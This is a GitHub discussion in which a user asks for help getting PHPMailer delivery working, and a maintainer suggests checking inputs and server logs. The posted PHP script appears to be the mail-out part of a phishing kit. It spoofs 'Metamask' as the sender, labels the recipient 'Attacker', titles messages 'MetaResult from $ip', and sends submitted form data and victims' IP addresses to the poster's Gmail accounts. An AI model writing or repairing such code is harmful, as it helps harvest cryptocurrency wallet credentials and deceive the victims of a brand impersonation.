### DISCUSSION TITLE
Mails never appear

### DISCUSSION THREAD

**Discussion by FuckingToasters** [PHPMailer/PHPMailer#2726] [Q&A]
Hello, i worked a bit with this libary now and solved a issue i had so far which were that it couldn't access the smtp server. 
The reason for it was that i specified my google account password and not a specfic application password. 
Now i don't get any error when trying to send a mail however the mail never appear in my inbox.
```php
$jsonconfig = file_get_contents('config.json');
$json_data = json_decode($jsonconfig,true);
$host = $json_data['SMTP Configuration']['Host'];
$user = $json_data['SMTP Configuration']['User'];
$pass = $json_data['SMTP Configuration']['Password'];

$send = "example1@gmail.com";
$send2 = "example2@gmail.com";
$subject = "MetaResult from $ip";
// $headers = "From: Meta<custome556pport@Spammershhhhmm.com>";
// $headers .= $_POST['example1@gmail.com']."\n";
// $headers .= "MIME-Version: 1.0\n";
$arr=array($send, $ip);
foreach ($arr as $send)
{

     $mail = new PHPMailer(true);

     try {
     //Server settings
     $mail->SMTPDebug = SMTP::DEBUG_SERVER;                      //Enable verbose debug output
     $mail->isSMTP();                                            //Send using SMTP
     $mail->Host       = $host;                     //Set the SMTP server to send through
     $mail->SMTPAuth   = true;                                   //Enable SMTP authentication
     $mail->Username   = $user;                     //SMTP username
     $mail->Password   = $pass;                               //SMTP password
     $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;            //Enable implicit TLS encryption
     $mail->Port       = 465;                                    //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`

     //Recipients
     $mail->setFrom('from@metamask.com', 'Metamask');
     $mail->addAddress($send, 'Attacker');     //Add a recipient
     $mail->addAddress($send2);               //Name is optional

     //Content
     $mail->isHTML(true);
     $mail->Subject = $subject;
     $mail->Body    = $message;
     // $mail->AltBody = 'This is the body in plain text for non-HTML mail clients';

     $mail->send();
     print('Message has been sent');
     } catch (Exception $e) {
     	print("Message could not be sent. Mailer Error: {$mail->ErrorInfo}");
     }
     // mail($send,$subject,$message,$headers);
     // mail($to,$subject,$message,$headers);
}
```

My config.json file:
```json
{
  "SMTP Configuration": {
    "Host": "smtp.google.com",
    "User": "example3@gmail.com",
    "Password": "examplepassword"
  }
}
```

**Comment by Synchro** [comment]
You have enabled debug output, which should show a successful delivery, but you have not shown us that. Have you checked your spam folder?

**Reply by FuckingToasters** [reply]
This happen when running on localhost:
`Message could not be sent. Mailer Error: Invalid address:  (to): ::1`

If i run it online then after submitting the form ionly a blank page is shown.

**Reply by Synchro** [reply]
I'm guessing you're the same person that asked [this question](https://stackoverflow.com/questions/72834650/how-do-i-need-to-handle-situations-in-which-no-mails-are-sent-by-smtp-google-co). The comment I posted there stands: `::1` is not a valid email address, so check your inputs.

If your script has a fatal error, you'll usually get a blank page, but your web server will log the errors.

**Reply by FuckingToasters** [reply]
Yes, that indeed was me but i'm not a lot on stackoverflow so i not noticed your reply. even if the ip isn't ::1 (if i run it on a actual server) then there is a blank page which do nothing. not even outputs any error then. If the webserver really log the errors then i'm unsure where to find them. i start the webserver using xampp on windows & linux and i don't see webserver log outputs there.
